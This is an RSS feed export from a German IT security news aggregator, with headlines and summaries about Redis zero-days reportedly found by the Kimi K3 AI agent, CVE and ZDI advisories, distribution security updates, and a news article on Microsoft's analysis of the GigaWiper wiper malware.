<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=what+redis+when%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 14:15:46 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 14:15:46 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=what+redis+when%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=what+redis+when%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Moonshot AI’s Kimi K3 Finds Redis Flaws, Builds RCE Exploits]]></title>
<description><![CDATA[Moonshot AI’s Kimi K3 reportedly found Redis flaws and built RCE exploits, raising urgent patching and AI security concerns.]]></description>
<link>https://tsecurity.de/de/3691794/it-nachrichten/moonshot-ais-kimi-k3-finds-redis-flaws-builds-rce-exploits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691794/it-nachrichten/moonshot-ais-kimi-k3-finds-redis-flaws-builds-rce-exploits/</guid>
<pubDate>Fri, 24 Jul 2026 16:43:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Moonshot AI’s Kimi K3 reportedly found Redis flaws and built RCE exploits, raising urgent patching and AI security concerns.]]></content:encoded>
</item>
<item>
<title><![CDATA[Kimi K3: Chinesische KI findet mehrere Zero-Day-Lücken in redis-Datenbank | heise online]]></title>
<description><![CDATA[Ein IT-Forscher hat mit der ... Ob Sicherheitslücken, Viren oder Trojaner – alle sicherheitsrelevanten Meldungen gibts bei heise security ...]]></description>
<link>https://tsecurity.de/de/3691585/it-security-nachrichten/kimi-k3-chinesische-ki-findet-mehrere-zero-day-luecken-in-redis-datenbank-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691585/it-security-nachrichten/kimi-k3-chinesische-ki-findet-mehrere-zero-day-luecken-in-redis-datenbank-heise-online/</guid>
<pubDate>Fri, 24 Jul 2026 14:58:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein <b>IT</b>-Forscher hat mit der ... Ob Sicherheitslücken, Viren oder Trojaner – alle sicherheitsrelevanten Meldungen gibts bei heise <b>security</b> ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Kimi K3: Chinesische KI findet mehrere Zero-Day-Lücken in redis-Datenbank]]></title>
<description><![CDATA[Ein IT-Forscher hat mit der chinesischen KI Kimi K3 mehrere Zero-Day-Lücken in der redis-Datenbank entdeckt. Updates bestätigen die Funde.]]></description>
<link>https://tsecurity.de/de/3691218/it-nachrichten/kimi-k3-chinesische-ki-findet-mehrere-zero-day-luecken-in-redis-datenbank/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691218/it-nachrichten/kimi-k3-chinesische-ki-findet-mehrere-zero-day-luecken-in-redis-datenbank/</guid>
<pubDate>Fri, 24 Jul 2026 12:03:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein IT-Forscher hat mit der chinesischen KI Kimi K3 mehrere Zero-Day-Lücken in der redis-Datenbank entdeckt. Updates bestätigen die Funde.]]></content:encoded>
</item>
<item>
<title><![CDATA[Kimi K3: Chinesische KI findet mehrere Zero-Day-Lücken in redis-Datenbank]]></title>
<description><![CDATA[Ein IT-Forscher hat mit der chinesischen KI Kimi K3 mehrere Zero-Day-Lücken in der redis-Datenbank entdeckt. Updates bestätigen die Funde.]]></description>
<link>https://tsecurity.de/de/3691204/it-security-nachrichten/kimi-k3-chinesische-ki-findet-mehrere-zero-day-luecken-in-redis-datenbank/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691204/it-security-nachrichten/kimi-k3-chinesische-ki-findet-mehrere-zero-day-luecken-in-redis-datenbank/</guid>
<pubDate>Fri, 24 Jul 2026 11:57:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein IT-Forscher hat mit der chinesischen KI Kimi K3 mehrere Zero-Day-Lücken in der redis-Datenbank entdeckt. Updates bestätigen die Funde.]]></content:encoded>
</item>
<item>
<title><![CDATA[Kimi K3 Agents Found Redis Zero-Days and Built RCE Exploit, Researchers Say]]></title>
<description><![CDATA[Redis shipped seven security releases on July 23 after researchers published authenticated RCE PoCs for stock Redis 6.2.22, 7.4.9, 8.6.4, and 8.8.0. All four chains require RESTORE. The Streams chains also need EVAL and XGROUP; the 8.8.0 chain needs EVAL…
Read more →
The post Kimi K3 Agents Found...]]></description>
<link>https://tsecurity.de/de/3691089/it-security-nachrichten/kimi-k3-agents-found-redis-zero-days-and-built-rce-exploit-researchers-say/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691089/it-security-nachrichten/kimi-k3-agents-found-redis-zero-days-and-built-rce-exploit-researchers-say/</guid>
<pubDate>Fri, 24 Jul 2026 11:09:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Redis shipped seven security releases on July 23 after researchers published authenticated RCE PoCs for stock Redis 6.2.22, 7.4.9, 8.6.4, and 8.8.0. All four chains require RESTORE. The Streams chains also need EVAL and XGROUP; the 8.8.0 chain needs EVAL…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/kimi-k3-agents-found-redis-zero-days-and-built-rce-exploit-researchers-say/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/kimi-k3-agents-found-redis-zero-days-and-built-rce-exploit-researchers-say/">Kimi K3 Agents Found Redis Zero-Days and Built RCE Exploit, Researchers Say</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kimi K3 Agents Found Redis Zero-Days and Built RCE Exploit, Researchers Say]]></title>
<description><![CDATA[Redis shipped seven security releases on July 23 after researchers published authenticated RCE PoCs for stock Redis 6.2.22, 7.4.9, 8.6.4, and 8.8.0.

All four chains require RESTORE. The Streams chains also need EVAL and XGROUP; the 8.8.0 chain needs EVAL and the bundled RedisBloom module. Redis ...]]></description>
<link>https://tsecurity.de/de/3691059/it-security-nachrichten/kimi-k3-agents-found-redis-zero-days-and-built-rce-exploit-researchers-say/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691059/it-security-nachrichten/kimi-k3-agents-found-redis-zero-days-and-built-rce-exploit-researchers-say/</guid>
<pubDate>Fri, 24 Jul 2026 10:59:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Redis shipped seven security releases on July 23 after researchers published authenticated RCE PoCs for stock Redis 6.2.22, 7.4.9, 8.6.4, and 8.8.0.

All four chains require RESTORE. The Streams chains also need EVAL and XGROUP; the 8.8.0 chain needs EVAL and the bundled RedisBloom module. Redis says the underlying memory flaws may lead to remote code execution.

Redis 6.2.23, 7.2.15, and 7.4.10]]></content:encoded>
</item>
<item>
<title><![CDATA[New Kimi K3 AI Agent Uncovers Redis Remote Code Execution Flaws in Just 27 Minutes]]></title>
<description><![CDATA[Moonshot AI’s newly unveiled Kimi K3 model is attracting considerable attention in the cybersecurity community after successfully demonstrating its ability to autonomously identify critical vulnerabilities in Redis within minutes. This 2.8-trillion-parameter AI agent reportedly discovered multipl...]]></description>
<link>https://tsecurity.de/de/3689292/it-security-nachrichten/new-kimi-k3-ai-agent-uncovers-redis-remote-code-execution-flaws-in-just-27-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689292/it-security-nachrichten/new-kimi-k3-ai-agent-uncovers-redis-remote-code-execution-flaws-in-just-27-minutes/</guid>
<pubDate>Thu, 23 Jul 2026 16:10:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Moonshot AI’s newly unveiled Kimi K3 model is attracting considerable attention in the cybersecurity community after successfully demonstrating its ability to autonomously identify critical vulnerabilities in Redis within minutes. This 2.8-trillion-parameter AI agent reportedly discovered multiple remote code execution (RCE)…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-kimi-k3-ai-agent-uncovers-redis-remote-code-execution-flaws-in-just-27-minutes/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-kimi-k3-ai-agent-uncovers-redis-remote-code-execution-flaws-in-just-27-minutes/">New Kimi K3 AI Agent Uncovers Redis Remote Code Execution Flaws in Just 27 Minutes</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kimi K3 AI Agent Finds Redis RCE Vulnerabilities in Just 27 Minutes]]></title>
<description><![CDATA[Moonshot AI’s newly released Kimi K3, a 2.8-trillion-parameter mixture-of-experts model, has demonstrated the growing offensive capability of autonomous AI agents by independently uncovering remote code execution (RCE) vulnerabilities in Redis versions. The findings, shared as non-destructive pro...]]></description>
<link>https://tsecurity.de/de/3689197/it-security-nachrichten/kimi-k3-ai-agent-finds-redis-rce-vulnerabilities-in-just-27-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689197/it-security-nachrichten/kimi-k3-ai-agent-finds-redis-rce-vulnerabilities-in-just-27-minutes/</guid>
<pubDate>Thu, 23 Jul 2026 15:28:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Moonshot AI’s newly released Kimi K3, a 2.8-trillion-parameter mixture-of-experts model, has demonstrated the growing offensive capability of autonomous AI agents by independently uncovering remote code execution (RCE) vulnerabilities in Redis versions. The findings, shared as non-destructive proofs-of-concept on GitHub, mark one of the fastest documented cases of AI-driven vulnerability discovery in a widely deployed open-source […]</p>
<p>The post <a href="https://cyberpress.org/kimi-k3-ai-agent-finds-redis-rce-vulnerabilities/">Kimi K3 AI Agent Finds Redis RCE Vulnerabilities in Just 27 Minutes</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Kimi K3 AI Agent Uncovers Redis Remote Code Execution Flaws in Just 27 Minutes]]></title>
<description><![CDATA[Moonshot AI’s newly unveiled Kimi K3 model is attracting considerable attention in the cybersecurity community after successfully demonstrating its ability to autonomously identify critical vulnerabilities in Redis within minutes. This 2.8-trillion-parameter AI agent reportedly discovered multipl...]]></description>
<link>https://tsecurity.de/de/3689143/it-security-nachrichten/new-kimi-k3-ai-agent-uncovers-redis-remote-code-execution-flaws-in-just-27-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689143/it-security-nachrichten/new-kimi-k3-ai-agent-uncovers-redis-remote-code-execution-flaws-in-just-27-minutes/</guid>
<pubDate>Thu, 23 Jul 2026 15:14:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Moonshot AI’s newly unveiled Kimi K3 model is attracting considerable attention in the cybersecurity community after successfully demonstrating its ability to autonomously identify critical vulnerabilities in Redis within minutes. This 2.8-trillion-parameter AI agent reportedly discovered multiple remote code execution (RCE) vulnerabilities across various Redis versions, specifically 6.2.22, 7.4.9, 8.6.4, and 8.8.0. This highlights the increasing […]</p>
<p>The post <a href="https://gbhackers.com/new-kimi-k3-ai-agent-uncovers-redis-remote-code-execution-flaws/">New Kimi K3 AI Agent Uncovers Redis Remote Code Execution Flaws in Just 27 Minutes</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Kimi K3 AI Agent Uncovers 0-Day Exploits in Redis Server]]></title>
<description><![CDATA[A newly reported research effort tied to the Kimi K3 AI agent has surfaced multiple authenticated remote code execution (RCE) paths in Redis, one of the world’s most widely deployed in-memory data stores. The findings shared by researcher alias Bera Buddies cover the stock builds of Redis 6.2.22,...]]></description>
<link>https://tsecurity.de/de/3688821/it-security-nachrichten/new-kimi-k3-ai-agent-uncovers-0-day-exploits-in-redis-server/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688821/it-security-nachrichten/new-kimi-k3-ai-agent-uncovers-0-day-exploits-in-redis-server/</guid>
<pubDate>Thu, 23 Jul 2026 13:14:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly reported research effort tied to the Kimi K3 AI agent has surfaced multiple authenticated remote code execution (RCE) paths in Redis, one of the world’s most widely deployed in-memory data stores. The findings shared by researcher alias Bera Buddies cover the stock builds of Redis 6.2.22, 7.4.9, 8.6.4, and 8.8.0, combining a stream […]</p>
<p>The post <a href="https://cybersecuritynews.com/redis-server-0-day-exploit/">New Kimi K3 AI Agent Uncovers 0-Day Exploits in Redis Server</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How fork() duplicates a process without copying its memory]]></title>
<description><![CDATA[I made a visual explainer on how copy-on-write works in Linux. When a 10 GB process calls fork(), Linux does not immediately copy 10 GB of memory. It duplicates the page tables, points both processes at the same physical pages, marks them read-only, and waits for the first write. The video also c...]]></description>
<link>https://tsecurity.de/de/3679945/linux-tipps/how-fork-duplicates-a-process-without-copying-its-memory/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679945/linux-tipps/how-fork-duplicates-a-process-without-copying-its-memory/</guid>
<pubDate>Sun, 19 Jul 2026 22:24:23 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I made a visual explainer on how copy-on-write works in Linux.</p> <p>When a 10 GB process calls <code>fork()</code>, Linux does not immediately copy 10 GB of memory. It duplicates the page tables, points both processes at the same physical pages, marks them read-only, and waits for the first write.</p> <p>The video also covers things like page faults,<code>exec()</code>, Redis snapshots, Android Zygote, lazy zero pages, memory overcommit, COW storms, and some CVEs, etc</p> <p><a href="https://www.youtube.com/watch?v=VvwvLDpyZvk">Link for anyone interested</a></p> <p>Feedback welcome :)</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Ok_Marionberry8922"> /u/Ok_Marionberry8922 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1v0uqx6/how_fork_duplicates_a_process_without_copying_its/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v0uqx6/how_fork_duplicates_a_process_without_copying_its/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3734 | Redis on Windows dbghelp.dll uncontrolled search path (EUVD-2022-43090)]]></title>
<description><![CDATA[A vulnerability was found in Redis on Windows. It has been rated as critical. Impacted is an unknown function in the library C:/Program Files/Redis/dbghelp.dll. Performing a manipulation results in uncontrolled search path.

This vulnerability is known as CVE-2022-3734. Remote exploitation of the...]]></description>
<link>https://tsecurity.de/de/3679694/sicherheitsluecken/cve-2022-3734-redis-on-windows-dbghelpdll-uncontrolled-search-path-euvd-2022-43090/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679694/sicherheitsluecken/cve-2022-3734-redis-on-windows-dbghelpdll-uncontrolled-search-path-euvd-2022-43090/</guid>
<pubDate>Sun, 19 Jul 2026 17:38:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/redis">Redis</a> on Windows. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is an unknown function in the library <em>C:/Program Files/Redis/dbghelp.dll</em>. Performing a manipulation results in uncontrolled search path.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2022-3734">CVE-2022-3734</a>. Remote exploitation of the attack is possible. Furthermore, an exploit is available.

It is still unclear if this vulnerability genuinely exists.

The official Redis release is not affected. This issue might affect an unofficial fork or port on Windows only.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3647 | Redis up to 6.2.7/7.0.5 Crash Report debug.c sigsegvHandler denial of service (EUVD-2022-43006 / Nessus ID 239773)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Redis up to 6.2.7/7.0.5. This affects the function sigsegvHandler of the file debug.c of the component Crash Report. The manipulation leads to denial of service.

This vulnerability is documented as CVE-2022-3647. The attack ...]]></description>
<link>https://tsecurity.de/de/3678267/sicherheitsluecken/cve-2022-3647-redis-up-to-627705-crash-report-debugc-sigsegvhandler-denial-of-service-euvd-2022-43006-nessus-id-239773/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678267/sicherheitsluecken/cve-2022-3647-redis-up-to-627705-crash-report-debugc-sigsegvhandler-denial-of-service-euvd-2022-43006-nessus-id-239773/</guid>
<pubDate>Sat, 18 Jul 2026 18:42:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/redis">Redis up to 6.2.7/7.0.5</a>. This affects the function <code>sigsegvHandler</code> of the file <em>debug.c</em> of the component <em>Crash Report</em>. The manipulation leads to denial of service.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2022-3647">CVE-2022-3647</a>. The attack requires being on the local network. There is not any exploit available.

The actual existence of this vulnerability is currently in question.

It is suggested to install a patch to address this issue.

The vendor claims that this is not a DoS because it applies to the crash logging mechanism which is triggered after a crash has occurred.]]></content:encoded>
</item>
<item>
<title><![CDATA[ZDI-26-423: Synology DiskStation DS925+ MailPlus Redis Weak Cryptography for Passwords Remote Code Execution Vulnerability]]></title>
<description><![CDATA[This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology DiskStation DS925+ devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-15660.]]></description>
<link>https://tsecurity.de/de/3671991/sicherheitsluecken/zdi-26-423-synology-diskstation-ds925-mailplus-redis-weak-cryptography-for-passwords-remote-code-execution-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671991/sicherheitsluecken/zdi-26-423-synology-diskstation-ds925-mailplus-redis-weak-cryptography-for-passwords-remote-code-execution-vulnerability/</guid>
<pubDate>Wed, 15 Jul 2026 23:57:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology DiskStation DS925+ devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-15660.]]></content:encoded>
</item>
<item>
<title><![CDATA[ZDI-26-424: Synology DiskStation DS925+ MailPlus Improper Restriction of Communication Channel to Intended Endpoints Vulnerability]]></title>
<description><![CDATA[This vulnerability allows network-adjacent attackers to access the Redis instance on affected installations of Synology DiskStation DS925+ devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2026-13...]]></description>
<link>https://tsecurity.de/de/3671972/sicherheitsluecken/zdi-26-424-synology-diskstation-ds925-mailplus-improper-restriction-of-communication-channel-to-intended-endpoints-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671972/sicherheitsluecken/zdi-26-424-synology-diskstation-ds925-mailplus-improper-restriction-of-communication-channel-to-intended-endpoints-vulnerability/</guid>
<pubDate>Wed, 15 Jul 2026 23:57:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This vulnerability allows network-adjacent attackers to access the Redis instance on affected installations of Synology DiskStation DS925+ devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2026-13135.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (389-ds:1.4, buildah, freeipmi, freerdp, gegl, gimp, golang, kernel, libreoffice, maven:3.9, openexr, perl-DBI, plexus-utils, podman, tomcat, tomcat9, xorg-x11-server, and xorg-x11-server-Xwayland), Debian (imagemagick, p7zip, and redis), Fedora (bre...]]></description>
<link>https://tsecurity.de/de/3668095/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668095/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 14 Jul 2026 15:26:32 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (389-ds:1.4, buildah, freeipmi, freerdp, gegl, gimp, golang, kernel, libreoffice, maven:3.9, openexr, perl-DBI, plexus-utils, podman, tomcat, tomcat9, xorg-x11-server, and xorg-x11-server-Xwayland), <b>Debian</b> (imagemagick, p7zip, and redis), <b>Fedora</b> (breezy, calibre, and golang-github-openprinting-ipp-usb), <b>Mageia</b> (ffmpeg, gzip, haproxy, libheif, libtiff, libxml2, packages, perl-List-SomeUtils-XS, and perl-Socket), <b>SUSE</b> (alsa, chromedriver, curl, dhcpcd, docker-compose, glibc, haproxy, ImageMagick, jq, kernel, kubernetes, libpng15, libredwg-devel, libslirp, nghttp2, php8, python-Pillow, python313-Django, python313-weasyprint, qemu, rust-keylime, sccache, and systemd), and <b>Ubuntu</b> (cifs-utils, libexif, libreoffice, libssh2, openssh, and pipewire).]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft warnt: Diese Windows-Malware kann Daten löschen und Rechner zerstören]]></title>
<description><![CDATA[Microsoft hat eine neue Schadsoftware analysiert, die nicht nur Daten ausspionieren, sondern komplette Systeme unbrauchbar machen kann. Die als GigaWiper bezeichnete Malware kombiniert mehrere zerstörerische Funktionen mit einer leistungsfähigen Hintertür für Angreifer.



Die Sicherheitsforscher...]]></description>
<link>https://tsecurity.de/de/3665371/it-nachrichten/microsoft-warnt-diese-windows-malware-kann-daten-loeschen-und-rechner-zerstoeren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665371/it-nachrichten/microsoft-warnt-diese-windows-malware-kann-daten-loeschen-und-rechner-zerstoeren/</guid>
<pubDate>Mon, 13 Jul 2026 15:18:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><strong>Microsoft</strong> hat eine neue <strong>Schadsoftware</strong> analysiert, die nicht nur Daten ausspionieren, sondern komplette Systeme unbrauchbar machen kann. Die als GigaWiper bezeichnete <strong>Malware</strong> kombiniert mehrere zerstörerische Funktionen mit einer leistungsfähigen Hintertür für Angreifer.</p>



<p>Die Sicherheitsforscher von Microsoft Threat Intelligence entdeckten die Aktivitäten bereits im Oktober 2025. Damals wurden in kompromittierten Umgebungen erste Fälle beobachtet, bei denen Systeme mit zerstörerischen Werkzeugen angegriffen wurden. Die <a href="https://www.microsoft.com/en-us/security/blog/2026/07/09/gigawiper-anatomy-of-a-destructive-backdoor-assembled-from-multiple-malware/" target="_blank" rel="noreferrer noopener">nun veröffentlichte Analyse</a> zeigt das volle Ausmaß der Schadsoftware.</p>



<p>GigaWiper ist demnach keine klassische Lösch-Malware mit nur einer Aufgabe. Stattdessen vereint das Programm mehrere Schadfunktionen in einer einzigen Plattform. Andere Sicherheitsforscher verfolgen die Malware auch unter dem Namen BLUERABBIT.</p>



<h2 class="wp-block-heading">Malware kann Festplatten löschen und Daten unwiederbringlich zerstören</h2>



<p>Besonders gefährlich ist die Fähigkeit von GigaWiper, Festplatten auf niedriger Ebene zu überschreiben. Anders als gewöhnliche Schadprogramme löscht die Malware nicht einfach einzelne Dateien, sondern greift direkt auf die physischen Laufwerke zu.</p>



<p>Dabei kann GigaWiper unter anderem Partitionseinträge entfernen und Inhalte von Datenträgern überschreiben. Nach Abschluss der Aktion startet der Rechner neu – die darauf gespeicherten Daten sind anschließend nicht mehr normal verfügbar.</p>



<p>Eine weitere Funktion tarnt sich als Ransomware. Dabei verschlüsselt GigaWiper Dateien und versieht sie mit der Endung „.candy“. Allerdings handelt es sich nicht um eine klassische Erpressung: Die verwendeten Schlüssel werden zufällig erzeugt und nicht gespeichert. Eine spätere Entschlüsselung ist deshalb technisch nicht möglich.</p>



<p>Eine weitere Zerstörungsfunktion überschreibt das Windows-Systemlaufwerk mehrfach mit verschiedenen Datenmustern. Dadurch wird eine Wiederherstellung zusätzlich erschwert.</p>



<h2 class="wp-block-heading">GigaWiper ist mehr als ein Datenlöscher</h2>



<p>Die Schadsoftware beschränkt sich jedoch nicht auf die Zerstörung von Daten. Microsoft beschreibt GigaWiper als Backdoor, über die Angreifer dauerhaft Zugriff auf infizierte Systeme erhalten können.</p>



<p>Die Malware kann unter anderem:</p>



<ul class="wp-block-list">
<li>Bildschirmaufnahmen erstellen,</li>



<li>den Bildschirm aufzeichnen,</li>



<li>Fernsteuerungsfunktionen ermöglichen,</li>



<li>Systeminformationen sammeln,</li>



<li>Prozesse und Windows-Dienste verwalten,</li>



<li>die Windows-Registrierung verändern,</li>



<li>Ereignisprotokolle löschen, um Spuren zu verwischen.</li>
</ul>



<p>Damit können Angreifer zunächst Informationen über ein System sammeln oder die Kontrolle übernehmen, bevor sie zerstörerische Funktionen auslösen.</p>



<h2 class="wp-block-heading">Tarnung als OneDrive-Aufgabe</h2>



<p>Für eine möglichst lange Präsenz auf betroffenen Rechnern richtet GigaWiper laut Microsoft eine geplante Aufgabe im Windows-Aufgabenplaner ein. Diese trägt den Namen „OneDrive Update“ und wird regelmäßig ausgeführt.</p>



<p>Die Schadsoftware nutzt außerdem RabbitMQ und Redis für die Kommunikation mit Steuerungsservern. Dadurch können sich die Verbindungen in Unternehmensnetzwerken schwerer erkennen lassen, wenn diese Dienste dort bereits verwendet werden.</p>



<h2 class="wp-block-heading">Schadcode aus mehreren Malware-Familien zusammengeführt</h2>



<p>Eine Besonderheit von GigaWiper ist der Aufbau der Schadsoftware. Microsoft stellte fest, dass mehrere ältere Malware-Komponenten in das neue Programm integriert wurden.</p>



<p>Ein Teil der Funktionen stammt demnach aus Crucio, einer früher analysierten Ransomware. Eine weitere Komponente basiert auf FlockWiper, einer älteren Wiper-Schadsoftware. Die Angreifer haben diese Funktionen in eine neue, in der Programmiersprache Go entwickelte Backdoor integriert.</p>



<p>Dadurch können Angreifer je nach Ziel entscheiden, ob sie Systeme kontrollieren, Daten manipulieren oder eine vollständige Zerstörung auslösen.</p>



<h2 class="wp-block-heading">Was Windows-Nutzer jetzt wissen sollten</h2>



<p>GigaWiper richtet sich nach den bisherigen Erkenntnissen vor allem gegen gezielte Angriffe auf Organisationen und Unternehmen. Hinweise auf eine breite Verbreitung unter privaten Windows-Nutzern gibt es derzeit nicht.</p>



<p>Die Schadsoftware muss zunächst auf ein System gelangen und wird anschließend von Angreifern gesteuert. Für Privatanwender bleiben deshalb die klassischen Schutzmaßnahmen entscheidend: Windows und Sicherheitssoftware – <a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">die besten Antivirus-Tools haben wir hier getestet</a> – sollten aktuell gehalten werden, unbekannte Anhänge und Programme sollten vermieden werden.</p>



<p>Unternehmen sollten laut Microsoft unter anderem Schutzfunktionen wie Manipulationsschutz für Sicherheitssoftware aktivieren, moderne Angriffserkennung einsetzen und verdächtige Aktivitäten überwachen. Dazu gehören etwa ungewöhnliche Aufgaben im Windows-Aufgabenplaner oder unerwartete Netzwerkverbindungen.</p>



<p>Besonders wichtig sind regelmäßige Backups. Diese sollten möglichst getrennt vom Rechner gespeichert werden, denn gegen einen echten Wiper-Angriff hilft im Ernstfall nur eine unabhängige Datensicherung.</p>



